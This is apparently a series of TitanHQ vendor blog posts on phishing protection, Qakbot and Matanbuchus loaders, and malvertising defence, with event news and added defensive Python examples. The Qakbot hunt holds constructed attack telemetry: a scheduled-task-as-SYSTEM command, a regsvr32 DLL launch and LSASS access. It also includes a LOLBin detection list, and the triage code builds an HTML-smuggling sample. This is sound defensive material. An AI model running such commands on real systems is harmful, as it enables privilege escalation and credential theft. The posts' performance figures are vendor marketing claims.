SpamTitan Plus is a leading-edge artificial intelligence-driven anti-phishing solution from TitanHQ that provides better coverage than any other anti-phishing product on the market. The solution has 100% coverage of all current market-leading anti-phishing feeds, which gives users a significant uplift in phishing link detections and faster detection of phishing threats than any other product.
The solution is fed massive clickstream traffic from more than 600 million endpoints worldwide, and more than 10 million new, and never-before-seen phishing and malicious URLs are added to the solution and blocked for all users every single day. When a new, malicious URL is detected, it takes less than 5 minutes for all users of SpamTitan Plus to be protected. Independent tests have shown SpamTitan Plus is 1.6 times faster at detecting phishing URLs than any of the current market leaders and achieves a 1.5x increase in unique phishing URL detections.
When a user clicks a link in an email, the URL is checked in real-time, not just when the email is delivered. This is important as campaigns are often conducted where the destination URL has malicious content added after delivery to bypass email security defenses. When SpamTitan Plus checks the link, the destination URL is scanned to identify spoofing and login pages, redirects are followed, and many dynamic checks are performed. If the destination URL is determined to be malicious, the user will be directed to a block page.
SpamTitan Plus was launched by TitanHQ in December 2021, and it has already proven popular with businesses that need the very best protection against phishing attacks. TitanHQ has now made a major update to the solution to improve its predictive phishing detection capabilities.
One of the ways that phishing campaigns evade security solutions is to use personalized URLs for each targeted company and victim. In a standard phishing campaign, the same URL is used for the entire campaign, so once that URL is detected as malicious it is blocked by email security solutions. If each email in a campaign carries a unique URL, identifying and blocking one of them does not affect any other email in the campaign, as each has a different URL. URLs are personalized at the path or parameter level, and most anti-phishing solutions provide no protection against these malicious personalized URLs. Personalized URLs are used in phishing, social engineering, reputation attacks, and malware distribution.
The latest predictive functionality detects and blocks automated bot phishing campaigns and personalized URL attacks, ensuring users get the very best phishing protection. The new capabilities have already been added to SpamTitan Plus and made available to all users.
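The two mechanisms described above, checking the link at click time rather than only at delivery, and matching URLs at the campaign level rather than by exact string, can be illustrated with a small checker. This is an added example written for this post, not SpamTitan Plus code: the redirect maps, the block-list entry and the "{id}" placeholder are all constructed, and a real implementation would follow HTTP redirects over the network instead of reading them from a dictionary.

```python
"""Time-of-click URL checking with campaign-level URL templates.

Added example, not SpamTitan Plus code. The redirect maps, block list and
sample URLs are constructed; "{id}" is this example's own placeholder.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# Path segments that look like per-recipient tokens: decimal ids, hex
# strings of 6+ chars, or long opaque alphanumeric strings.
TOKEN = re.compile(r"^(?:\d+|[0-9a-f]{6,}|[a-z0-9_-]{16,})$")

# One URL as a feed would store it. The campaign personalizes the segment
# after 'acct' per recipient, so exact matching covers only this one email.
EXACT_BLOCK = {"https://login-verify.example/acct/1b2c3d/index"}

# Constructed redirect maps: what the shortener resolved to when the email
# was delivered versus minutes later when the user clicked.
REDIRECTS_AT_DELIVERY = {
    "https://short.example/abc123": "https://welcome.example/offer",
}
REDIRECTS_AT_CLICK = {
    "https://short.example/abc123": "https://cdn-track.example/r?u=7f3a9c",
    "https://cdn-track.example/r?u=7f3a9c": "https://login-verify.example/acct/7f3a9c/index",
}


def url_template(url: str) -> str:
    """Reduce a URL to scheme://host/path with token-like segments replaced.

    The query string is dropped entirely because parameter values are the
    other common place a per-victim identifier is inserted.
    """
    parts = urlsplit(url.strip().lower())
    segments = ["{id}" if TOKEN.match(s) else s for s in parts.path.split("/")]
    return urlunsplit((parts.scheme, parts.netloc, "/".join(segments), "", ""))


# Campaign-level signatures derived from the exact entries in the feed.
TEMPLATE_BLOCK = {url_template(u) for u in EXACT_BLOCK}


def follow_redirects(url: str, redirects: dict, max_hops: int = 10) -> list:
    """Return the chain of URLs visited, bounded to defeat redirect loops."""
    hops = [url]
    while hops[-1] in redirects and len(hops) <= max_hops:
        hops.append(redirects[hops[-1]])
    return hops


def check_url(url: str, redirects: dict) -> dict:
    """Verdict for one click: every hop is checked, not only the final page."""
    hops = follow_redirects(url, redirects)
    for hop in hops:
        if hop in EXACT_BLOCK:
            return {"verdict": "block", "reason": "exact", "url": hop, "hops": hops}
        if url_template(hop) in TEMPLATE_BLOCK:
            return {"verdict": "block", "reason": "template", "url": hop, "hops": hops}
    return {"verdict": "allow", "reason": None, "url": hops[-1], "hops": hops}


if __name__ == "__main__":
    link = "https://short.example/abc123"
    print("at delivery:", check_url(link, REDIRECTS_AT_DELIVERY)["verdict"])
    print("at click:   ", check_url(link, REDIRECTS_AT_CLICK))
```

The same shortened link is clean when the message is delivered and malicious when it is clicked, which is why a delivery-time-only check misses it. The second miss it illustrates is the personalized path: the feed holds one recipient's URL, and only the template form catches the variant served to a different recipient.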
“With predictive phishing detection, SpamTitan Plus can now combat automated bot phishing. At TitanHQ we always strive to innovate and develop solutions that solve real security problems and provide tangible value to our customers. The end goal is to have our partners and customers two or three steps ahead of the phishers and cybercriminals,” said Ronan Kavanagh, CEO, TitanHQ.
Qakbot malware is one of the oldest malware threats that is still in use, having first been detected in 2007. Qakbot malware – aka QBot, QuakBot, and Pinkslipbot – has seen extensive development over the years and still poses a major threat to businesses worldwide. QakBot malware started life as a banking Trojan that was used to steal sensitive financial information. Qakbot malware can now also steal sensitive data from browsers and emails and as with many other modular banking Trojans, it also serves as a malware loader and is used to deliver secondary malware payloads.
As was the case back in 2007, Qakbot malware is most commonly delivered via phishing emails, using either links to malicious websites where the malware is downloaded or malicious email attachments. Once initial access is gained to a victim’s network, privileges are escalated, and the malware operator uses Microsoft tools for lateral movement – termed living-off-the-land. This method means additional tools, which could be detected, do not need to be downloaded, and the attackers can hide their activity amongst legitimate use of the same tools by IT teams.
Qakbot malware is known to use exploits for known vulnerabilities. Qakbot malware was recently observed attempting to exploit the Follina remote code execution vulnerability (CVE-2022-30190) in the Microsoft Support Diagnostic Tool (MSDT), which affects Windows 11 and prior versions and most versions of Office. The malware has also used an exploit for Zerologon, to name just a couple.
In addition to being able to read and exfiltrate email data, QakBot malware – like Emotet – can hijack message threads and self-propagate. An existing email thread is found, and a malicious link is inserted into the conversation. Since the email sent includes the text of the previous conversation between two individuals, there is a reasonable chance of the malicious website being visited and the file being downloaded and opened. One way of getting around spam filters is for the URL to be included but not made clickable, which means it needs to be manually copied into the browser.
Qakbot malware is strongly associated with ransomware attacks. Once the operators of the malware have achieved their aims, they sell access to infected devices to other threat groups as a secondary revenue stream. For example, QakBot malware has been observed delivering Cobalt Strike beacons to victims’ devices, and access to those beacons is then sold to ransomware gangs. The malware has been used by various ransomware gangs, including ProLock, Black Basta, MegaCortex, Egregor, and REvil.
A 2022 analysis of the malware, published by DFIR, highlights the speed at which attacks occur. DFIR shared information about an attack in October in which the entire network was compromised in minutes. In this case, it is unclear how initial access was gained, but it is likely that the malware was delivered via a phishing email with an infected Excel spreadsheet, which launched the Qakbot malware DLL loader. A scheduled task was created to elevate privileges to system level and Qakbot was then injected into many processes, including Microsoft Remote Assistance (msra.exe).
Within 30 minutes of initial access, browser data and emails had been stolen from the host, and within 50 minutes the malware had spread to another workstation and the process had been repeated. In a very short space of time, all workstations had been infected. Qakbot malware will also steal Windows credentials by dumping the memory of the Local Security Authority Subsystem Service (LSASS). Typically, credentials are stolen within 50 minutes of initial access being gained.
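The chain described in the two paragraphs above (Office document launching a DLL loader, a scheduled task to run as SYSTEM, then LSASS memory access) maps onto three process-telemetry rules that a SOC can run against endpoint logs. The hunt below is an added example, not code from the cited analysis or from TitanHQ: the events are constructed, Sysmon-like records, and the field names, the LOLBin list and the LSASS allow list are this example's assumptions and need tuning for a real estate.

```python
"""Hunting the Qakbot-style intrusion chain above in process telemetry.

Added example, not code from the cited analysis or from TitanHQ. The
events are constructed, Sysmon-like records; the field names and the
allow lists are assumptions of this example and must be tuned per estate.
"""
import re
from datetime import datetime
from pathlib import PureWindowsPath

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Signed Windows binaries routinely used to run a dropped DLL or script
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe"}
# Processes expected to open handles to lsass.exe (assumption for this example)
LSASS_ALLOW = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
# schtasks /RU SYSTEM or /RU "NT AUTHORITY\SYSTEM" on a lower-cased command line
RUN_AS_SYSTEM = re.compile(r'/ru\s+"?(?:nt authority\\)?system"?')

# Constructed timeline on one workstation; times are illustrative only.
EVENTS = [
    {"ts": "2022-10-05T10:00:00", "type": "process_create", "user": "WS01\\alice",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" C:\\Users\\alice\\Downloads\\invoice.xls'},
    {"ts": "2022-10-05T10:01:10", "type": "process_create", "user": "WS01\\alice",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\bld.dll"},
    {"ts": "2022-10-05T10:03:40", "type": "process_create", "user": "WS01\\alice",
     "parent": r"C:\Windows\System32\regsvr32.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /RU SYSTEM /SC ONCE /TN upd /TR "regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\bld.dll" /ST 10:05'},
    # Constructed: an injected host process reading LSASS memory
    {"ts": "2022-10-05T10:31:00", "type": "process_access", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\msra.exe", "target": r"C:\Windows\System32\lsass.exe"},
    # Benign: the AV engine opening LSASS, which the allow list suppresses
    {"ts": "2022-10-05T10:32:15", "type": "process_access", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe"},
    {"ts": "2022-10-05T10:40:00", "type": "process_create", "user": "WS01\\alice",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe"},
]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def hunt(events: list) -> list:
    """Return alerts for the three chain stages with minutes since the first event."""
    events = sorted(events, key=lambda e: e["ts"])
    t0 = datetime.fromisoformat(events[0]["ts"])
    alerts = []

    def alert(rule: str, e: dict) -> None:
        mins = (datetime.fromisoformat(e["ts"]) - t0).total_seconds() / 60
        alerts.append({"rule": rule, "elapsed_min": round(mins, 1),
                       "image": base(e["image"]), "ts": e["ts"]})

    for e in events:
        if e["type"] == "process_create":
            cmd = e.get("cmdline", "").lower()
            if base(e["parent"]) in OFFICE and base(e["image"]) in LOLBINS:
                alert("office_spawns_lolbin", e)        # initial access via macro
            if base(e["image"]) == "schtasks.exe" and "/create" in cmd and RUN_AS_SYSTEM.search(cmd):
                alert("scheduled_task_as_system", e)    # privilege escalation
        elif e["type"] == "process_access":
            if base(e["target"]) == "lsass.exe" and base(e["image"]) not in LSASS_ALLOW:
                alert("lsass_access", e)                # credential theft
    return alerts


if __name__ == "__main__":
    for a in hunt(EVENTS):
        print(f"+{a['elapsed_min']:5.1f} min  {a['rule']:26s} {a['image']}")
```

The elapsed-minutes field is there because the point of the analysis is tempo: when the three alerts fire on one host inside half an hour, the response has to be containment, not a ticket for the next business day. The parent/child rule is the high-value one, since an Office process spawning regsvr32 or rundll32 is rare in legitimate use and fires before the attacker has SYSTEM.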
Detecting the malware once it has been installed can be a challenge. The key to protecting against infections is to improve email defenses, as this is the most common attack vector. That means implementing an email security solution that is not reliant on signature-based detection and includes behavior-based detection methods such as sandboxing and outbound scanning to identify compromised mailboxes. These features are present in SpamTitan Email Security products. A web filter is also recommended. WebTitan can detect and block command and control communications and provides additional protection against malicious links in emails, providing time-of-click protection to prevent users from visiting malicious websites linked in emails.
It is important for businesses to take steps to improve web security and block the web-based component of phishing attacks and drive-by malware downloads, and one of the most important steps to take is to protect browsers against malvertising.
What is Malvertising?
Malvertising is the term given to the use of malicious online adverts for downloading malware or directing website traffic to attacker-controlled websites for phishing or other scams. Malicious adverts may be placed on compromised websites, but commonly they are added to legitimate ad networks, which website operators use for improving engagement and generating additional revenue. Third-party advertising blocks are used on many high-traffic websites, and if malicious adverts are added, they can be displayed on large numbers of high-traffic websites to huge volumes of website visitors. Since the adverts may be displayed on trusted websites, that trust is then transferred to the adverts. Website visitors may click the adverts and be directed to a malicious website. Worse, it is possible to embed malicious code into the adverts themselves, so it is not always necessary to click the advert to have malware downloaded.
Malvertising is a significant attack vector and is often used for malware distribution. The attacks can bypass in-built browser security features that protect against website redirects and pop-up adverts. It is also possible for attackers to create malvertising campaigns that are targeted at specific users, and only serve adverts to those users.
How to Defend Against Malvertising
Since people interact with the Internet using a web browser, web browsers should be secured to protect against malvertising. The malicious code in adverts can probe for and exploit vulnerabilities in web browsers. Those vulnerabilities may exist due to the use of an outdated web browser such as Internet Explorer, or a web browser that has not been updated to the latest version. Web browsers may have insecure configurations that can be exploited, or users could be redirected to a malicious website or web application. Attackers also use malvertising to exploit human weaknesses, such as insecure browsing habits or untrained or poorly trained users.
The threat from malvertising cannot be totally eliminated, but steps can be taken to reduce risk. Many of the protective measures are low-cost and can be implemented easily. The four main methods for protecting against malvertising, as recommended by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) are:
Standardize and secure web browsers
Deploy ad blocking software
Implement protective domain name system technologies
Isolate web browsers from operating systems
Standardize and secure web browsers
Limit the browsers, versions, and configurations that are used by your organization – The greater the variety, the higher the probability that vulnerabilities will exist that can be exploited. By restricting browsers, versions, and configurations, you will have a more consistent and easily managed network portfolio. You must then ensure that the browsers are kept up to date and new versions are installed as soon as possible after a version has been released.
Deploy ad blocking software
Ad-blocking software can prevent malicious adverts from being displayed. Ad blockers will remove adverts or prevent them from being displayed, often via a web browser extension. In theory, ad blockers are a great choice for defending against malvertising, but this option should be treated with caution as ad blockers have their own security concerns. Ad blockers may operate with high levels of privileges and may therefore access all data traffic between the user workstation and the network, which means they may be able to perform malicious actions with high levels of privileges. Malicious ad blockers have been detected, and some browser extensions accept payments from advertisers to ensure that paid-for ads are allowlisted and are not blocked.
Isolate web browsers from operating systems
Browser isolation is an architectural decision that is used by many large organizations to defend against web-based threats, although the design, implementation, and maintenance of Internet browser isolation can be complex and may be beyond the capabilities of some small- and medium-sized businesses. Browser isolation involves creating a logical barrier between the web browser and other systems and operates on a zero-trust principle, assuming that all web traffic is untrustworthy and potentially malicious. Browser isolation is often achieved locally using a sandbox or virtual machine on the user’s computer.
Implement protective domain name system technologies
One of the best steps to take is to use protective domain name system (DNS) technologies such as WebTitan. WebTitan is a DNS-based web filtering solution for blocking access to malicious websites. When a malvertising campaign attempts to redirect a user to a malicious domain, that redirect is blocked, and the user is directed to a locally hosted block page and advised that the web resource cannot be accessed because a threat was detected. WebTitan can also be configured to block access to risky categories of websites and will block drive-by malware downloads.
WebTitan incorporates threat intelligence feeds and collects data from over 500 million endpoints worldwide to ensure that threats are rapidly blocked for all users when new threats are detected. According to CISA, 91% of malware uses DNS for cyberattacks. WebTitan can block malware command-and-control server communications.
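To make the protective-DNS behaviour described above concrete, the following added example (written for this post, not WebTitan code) models the policy decision a filtering resolver makes for each query: the name and every parent domain are checked against a threat feed first, then an explicit allow list, then a category policy, and a blocked name is answered with the address of a local block page instead of the real record. The feed entries, category map, allow list, upstream answers and block-page address are all constructed.

```python
"""Protective DNS policy lookup, modelled on the behaviour described above.

Added example, not WebTitan code. The threat feed, category map, allow
list, upstream answers and block-page address are all constructed.
"""

BLOCK_PAGE_IP = "10.0.0.50"  # constructed: address of the locally hosted block page
THREAT_FEED = {"ad-redirect.example", "c2-beacon.example"}  # constructed feed entries
CATEGORY = {"bets.example": "gambling", "news.example": "news", "files.example": "file-sharing"}
BLOCKED_CATEGORIES = {"gambling", "file-sharing"}  # policy chosen for this example
ALLOW_LIST = {"cdn.files.example"}  # explicit exception to the category policy
UPSTREAM = {  # constructed answers a real resolver would fetch from the internet
    "news.example": "203.0.113.10",
    "cdn.files.example": "203.0.113.20",
    "share.files.example": "203.0.113.21",
    "tracker.ad-redirect.example": "198.51.100.5",
    "bets.example": "198.51.100.9",
}


def parents(name: str):
    """Yield the name and each parent domain: a.b.example -> a.b.example, b.example, example."""
    labels = name.split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def resolve(name: str) -> dict:
    """Policy decision for one query; blocked names resolve to the block page."""
    name = name.rstrip(".").lower()          # normalise case and trailing dot
    candidates = list(parents(name))
    # 1. Threat intelligence wins over everything, including the allow list,
    #    so a compromised subdomain of an allowed name is still blocked.
    for c in candidates:
        if c in THREAT_FEED:
            return {"name": name, "action": "block", "reason": f"threat-feed:{c}",
                    "answer": BLOCK_PAGE_IP}
    # 2. Explicit allow-list entries override the category policy.
    if any(c in ALLOW_LIST for c in candidates):
        return {"name": name, "action": "allow", "reason": "allow-list",
                "answer": UPSTREAM.get(name)}
    # 3. Category policy, again matched on the name and its parents.
    for c in candidates:
        cat = CATEGORY.get(c)
        if cat in BLOCKED_CATEGORIES:
            return {"name": name, "action": "block", "reason": f"category:{cat}",
                    "answer": BLOCK_PAGE_IP}
    return {"name": name, "action": "allow", "reason": "no-policy-match",
            "answer": UPSTREAM.get(name)}


if __name__ == "__main__":
    for q in ["news.example", "tracker.ad-redirect.example", "share.files.example",
              "cdn.files.example", "WWW.C2-Beacon.example."]:
        r = resolve(q)
        print(f"{q:32s} {r['action']:5s} {r['reason']:28s} -> {r['answer']}")
```

Matching on parent domains is what lets a single feed entry cover the throwaway subdomains a malvertising redirector or command-and-control server rotates through, and answering with the block page rather than NXDOMAIN gives the user the "threat detected" explanation instead of a generic browser error.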
Advice from the U.S. Cybersecurity and Infrastructure Security Agency
In 2021, CISA issued a Capacity Enhancement Guide for all federal agencies calling for them to take steps to secure browsers and defend against malvertising. This year, CISA has recommended all businesses and non-profit organizations follow the guidance and take steps to protect their browsers against malvertising.
Phishing emails are commonly used to distribute malware and in recent years malware loaders have been a common payload. Malware loaders include the likes of BazarLoader and Bumblebee, which are used to infect devices with the goal of delivering the malware and ransomware payloads of other threat groups.
Security researchers have identified a relatively new malware loader dubbed Matanbuchus that is being delivered via phishing emails. Like other malware loaders, Matanbuchus is operated under the malware-as-a-service model, and has been developed to stealthily download and execute second-stage malware payloads and executable files. The Matanbuchus loader has recently been observed dropping Cobalt Strike on infected systems. Cobalt Strike is a legitimate adversary simulation framework that is used in red team operations for detecting vulnerabilities that could potentially be exploited, but is also extensively used by criminal hackers for post-exploitation activities.
The Matanbuchus loader is currently being offered on Russian cybercrime forums for $2,500, and has been available since at least February 2021, with a malware developer operating under the moniker BelialDemon believed to be the developer of the malware. BelialDemon is known to have been involved in the development and sale of other malware loaders, such as TrumpLoader.
Matanbuchus, which is an alternate name for the demon Belial, can be used to launch an .exe or .dll file in memory, add or modify scheduled tasks, launch PowerShell commands, and execute standalone executable files to load a DLL. The malware has already been used in several attacks in the United States, including against entities in the education sector.
Researchers at Palo Alto Networks’ Unit 42 team have identified phishing emails being used to deliver the Matanbuchus loader that use Excel documents with malicious macros. As is common in these types of phishing campaigns, if the user opens the attached file, they are informed that the document was created in an earlier version of Microsoft Excel, so the content cannot be viewed unless the user clicks on Enable Editing and then Enable Content. Should content be enabled, Excel 4.0 macros are then leveraged to drop and execute the Matanbuchus loader.
A campaign has also been detected that uses a .zip file attachment that contains an HTML file, which delivers a second .zip file that includes an MSI installer. If that file is executed, an error message is displayed indicating to the user that something has gone wrong, when in the background a DLL file is delivered and executed, which acts as the loader for delivering the Matanbuchus loader DLL file.
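Both delivery chains above can be caught before anything is executed by unpacking the attachment and looking at what it contains: an Excel 4.0 macro sheet inside an Office file, or an archive whose HTML member carries a base64-encoded second archive that in turn holds an installer. The triage routine below is an added example, not Unit 42 or TitanHQ code; the sample archives are constructed in memory, the HTML member smuggles the inner ZIP as a base64 string (one common way an HTML file "delivers" a second file), and the extension lists, depth limit and size cap are this example's own policy.

```python
"""Attachment-chain triage for the nested ZIP/HTML/MSI and Excel 4.0 macro
lures described above.

Added example, not Unit 42 or TitanHQ code. The archives are constructed
in memory; the extension lists, depth limit and size cap are this
example's policy, not any product's configuration.
"""
import base64
import binascii
import io
import re
import zipfile
from pathlib import PurePosixPath

PAYLOAD_EXT = {".msi", ".exe", ".dll", ".js", ".vbs", ".lnk", ".hta", ".iso", ".img"}
HTML_EXT = {".html", ".htm"}
MAX_DEPTH = 3                   # archive layers to unpack before giving up
MAX_MEMBER = 50 * 1024 * 1024   # refuse to expand members larger than this
BLOCK_ON = {"executable_payload", "excel4_macro_sheet", "nesting_too_deep", "oversized_member"}
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")   # long base64 runs inside HTML


def smuggled_archives(html: bytes):
    """Yield ZIPs hidden as base64 text in an HTML file (HTML smuggling)."""
    for m in B64_RUN.finditer(html):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        if blob.startswith(b"PK\x03\x04"):       # local file header of a ZIP
            yield blob


def inspect_archive(data: bytes, depth: int = 0, prefix: str = "") -> list:
    """Walk a ZIP (OOXML documents are ZIPs too) and return (finding, path) pairs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            path = prefix + info.filename
            ext = PurePosixPath(info.filename).suffix.lower()

            def descend(blob: bytes, kind: str) -> None:
                if depth + 1 >= MAX_DEPTH:
                    findings.append(("nesting_too_deep", path))
                else:
                    findings.append((kind, path))
                    findings.extend(inspect_archive(blob, depth + 1, path + "/"))

            if info.file_size > MAX_MEMBER:
                findings.append(("oversized_member", path))
            elif info.filename.startswith("xl/macrosheets/"):
                findings.append(("excel4_macro_sheet", path))   # XLM (Excel 4.0) macro sheet
            elif ext in PAYLOAD_EXT:
                findings.append(("executable_payload", path))
            elif ext in HTML_EXT:
                findings.append(("html_in_archive", path))
                for blob in smuggled_archives(zf.read(info)):
                    descend(blob, "smuggled_archive")
            elif ext == ".zip":
                descend(zf.read(info), "nested_archive")
    return findings


def triage(data: bytes) -> tuple:
    """Return ("block" | "quarantine" | "allow", findings) for one attachment."""
    findings = inspect_archive(data)
    kinds = {k for k, _ in findings}
    if kinds & BLOCK_ON:
        return "block", findings
    if kinds:
        return "quarantine", findings
    return "allow", findings


def make_zip(entries: dict) -> bytes:
    """Build a ZIP in memory from {name: bytes}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples mirroring the two campaigns (placeholder contents only)
INNER_ZIP = make_zip({"update.msi": b"MSI placeholder, not a real installer"})
SMUGGLING_HTML = b"<html><script>var p='" + base64.b64encode(INNER_ZIP) + b"';</script></html>"
CAMPAIGN_ZIP = make_zip({"invoice.html": SMUGGLING_HTML})
MACRO_WORKBOOK = make_zip({"[Content_Types].xml": b"<Types/>", "xl/workbook.xml": b"<workbook/>",
                           "xl/macrosheets/sheet1.xml": b"<xm:macrosheet/>"})
CLEAN_ZIP = make_zip({"report.txt": b"quarterly numbers"})

if __name__ == "__main__":
    for label, sample in [("campaign zip", CAMPAIGN_ZIP), ("xlsm", MACRO_WORKBOOK), ("clean", CLEAN_ZIP)]:
        verdict, found = triage(sample)
        print(f"{label:13s} {verdict:10s} {found}")
```

The depth limit and member-size cap matter as much as the detections: an attachment scanner that recurses without bound is itself a denial-of-service target. Static unpacking of this kind complements rather than replaces sandbox detonation, since it sees the lure's structure instantly but cannot observe what a macro would do once enabled.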
To block the delivery of malware loaders such as Matanbuchus, it is important to implement multiple cybersecurity solutions. A spam filter such as SpamTitan can be used to block the delivery of the phishing emails. SpamTitan includes dual antivirus engines for detecting and blocking known malware and sandboxing to identify unknown malware through in-depth analysis of the behavior of attached files.
A web filter such as WebTitan should be used to block connections to malicious websites that host the malware. WebTitan can also be configured to block downloads of files often used to deliver malware and command-and-control center communications.
It is also strongly recommended to provide comprehensive security awareness training to all members of the workforce to explain the threat of phishing emails, explain the red flags to look for in emails, and not to open attachments unless they can be verified as authentic. TitanHQ can help in this regard through the SafeTitan Security Awareness Training solution, which includes a phishing simulation platform for simulating phishing emails to test how employees respond. For further information on these solutions, contact TitanHQ today.
TitanHQ has been included in the Expert Insights’ list of the Top 100 Most Innovative Cybersecurity Companies of 2022. Expert Insights is a leading online publication for businesses that conducts research into cloud-based business technologies and cybersecurity solutions to help businesses with their purchasing decisions. The site includes editorial buyers’ guides, industry analyses, interviews, and technical product reviews written by industry experts, and is visited by more than 80,000 business owners and IT admins each month.
In addition to an awards program that recognizes the best cloud-based and cybersecurity solutions – TitanHQ received 5 ‘Best of’ Awards in Spring 2022 – Expert Insights produces a list of the Top 100 Most Innovative Cybersecurity Companies. The list is divided into 12 categories and recognizes the most innovative companies that are developing cutting-edge solutions for businesses and consumers to help them deal with current and emerging cyber threats. TitanHQ was included in the list in the Email and Messaging Security category.
It has been a busy year for TitanHQ. The company has been taking great strides into the U.S. market and has significantly boosted its presence throughout North America and globally, and has brought in a host of new talent. The latest addition to the North American management team is channel veteran, Tom Watson, who was recently appointed as TitanHQ’s new Channel Chief. Watson is now working alongside another channel champion and recent appointee, Jeff Benedetti, who is TitanHQ’s new VP of Sales.
TitanHQ has recently bolstered its product portfolio with another product for boosting defenses against phishing and other cyber threats – the SafeTitan Security Awareness and Phishing Simulation platform, which follows on from the launch of a cutting-edge addition to the SpamTitan suite of products, SpamTitan Plus. SpamTitan Plus includes all of the market-leading anti-phishing feeds and provides unrivaled detection speeds of malicious URLs – 1.6x faster than the current market-leading anti-phishing solutions.
“The overwhelming feedback from our users and customer base has been that phishing attacks are becoming more advanced, proficient, and dangerous. Phishing is the number one problem to solve in the email security community,” said TitanHQ CEO, Ronan Kavanagh. “With that in mind, we’re delighted to have been recognized in the Email and Messaging Security Category. We will continue to innovate and provide email and messaging security solutions that MSPs can use to deliver a consistent, secure, and reliable experience to their customers,” added Kavanagh.
It can be a challenge for organizations to stay agile, competitive, and innovative in a digital world, especially when cyber threat actors are actively targeting businesses. Small- and medium-sized businesses are facing a multitude of threats, many of which target employees – a weak link in the security chain.
Cyberattacks can cause significant financial losses and irreparable damage to a business’s hard-earned reputation. While security solutions can be implemented to block those threats, cyber actors target a weak point in security – employees.
In addition to technical defenses, businesses need to create a human firewall through security awareness training. Digital security needs to be front and center of a business’s continued innovation, but it can be difficult to develop and maintain a cyber-savvy workforce, especially considering the rapidly changing threat landscape.
To help businesses succeed, TitanHQ, in partnership with the Oxford Cyber Academy, will be hosting a webinar to discuss employee cyber risks in growing organizations, and how to balance safety and agility.
During the webinar, attendees will be provided with valuable information on:
The rapidly changing threat landscape
What needs to be protected
The consequences of failing to protect digital assets and systems
How to balance technology and human cyber risks
How to improve employee security awareness and change employee behavior
A solution that makes it easy to provide intuitive, easy-to-understand, personalized, and targeted training that delivers it where it’s needed the most.
Join TitanHQ on June 7th where Nick Wilding, Neil Sinclair, Cyber Programme Lead, UK Police Crime Prevention Initiatives, and Richard Knowlton, Director of Security Studies at the Oxford Cyber Academy will discuss:
If you can’t make the event, register anyway and you will receive the webinar to watch on-demand at any time.
On June 1, 2022, Managed Service Providers (MSPs) have the opportunity of attending the ChannelNEXT in Toronto, ON. The event is an incredible opportunity for MSPs to gain practical insights on how to achieve greater success, with the one-day event focused on offering guidance and knowledge across all areas of MSP business, including business management, sales, marketing, leadership, and technology.
During the event, MSPs will discover how to overcome the common pain points such as hiring new talent and retaining employees, expanding the managed services they provide, scaling up their business, finding and retaining customers, and, importantly given the rapidly changing cyber threat landscape, how to protect themselves against cyberattacks and help their customers improve their security postures.
At this year’s event, ChannelNEXT will focus on four critical considerations for MSPs:
Solutions for cybersecurity, compliance, insurance, and best practices.
The methods that can be adopted for increasing sales in a digital-first economy.
The recent market developments in corporate digital transformation, as well as their implications.
How to increase recurring revenue through a stronger technology and service stack.
During the event, MSPs will be able to attend a wide range of learning sessions where they will hear from successful MSPs who will share the secrets that helped them achieve success and grow their businesses, keynote speeches from industry experts, and peer groups where they will be able to discuss the challenges they are facing and get tips and tricks on how to overcome those challenges. There will also be ample opportunities for networking.
TitanHQ is excited to be attending ChannelNEXT and having the opportunity to meet MSPs from Canada and beyond. Kyle Leyerzapf, Account Executive at TitanHQ, will be at the TitanHQ booth, and will be available to share the latest news from TitanHQ and will be happy to provide insights from his many years of experience within the channel and his wealth of knowledge about the growing concern about security threats targeting MSPs and their customers.
MSPs will also discover how TitanHQ solutions can be used to increase revenue, and how easy those solutions are to fit into an existing service stack through the TitanHQ MSP platform.
Tom Watson has taken on the role of Channel Chief at TitanHQ and will manage the company’s MSP tradeshows, roadshows, and webinars, and will oversee the new TitanHQ MSP program. Tom is a seasoned veteran of the IT channel, having worked as a network engineer, owned and operated an MSP business, provided MSP consultancy services and, for the past 24 years, has been a vendor evangelist for a swathe of tech companies. Tom has also previously served as Channel Chief for grade one vendors such as NinjaOne and Axcient. Tom is committed to keeping TitanHQ’s already exceptional level of service delivery in perfect alignment with changing MSP demands.
TitanHQ is undergoing a major expansion in the U.S. market to meet the massive demand for TitanHQ services from U.S. MSPs. Many international vendors have embarked upon an expansion in the United States but have overlooked the importance of bringing in locally sourced, experienced advisors to assist with serving the close-knit U.S. market. TitanHQ recognizes the importance of bringing in top local talent, hence the recruitment of Tom Watson. Tom will be based in TitanHQ’s new U.S. base in Shelton, Connecticut, where he will work alongside another recently appointed U.S. IT channel veteran, Jeff Benedetti, TitanHQ’s VP of Sales.
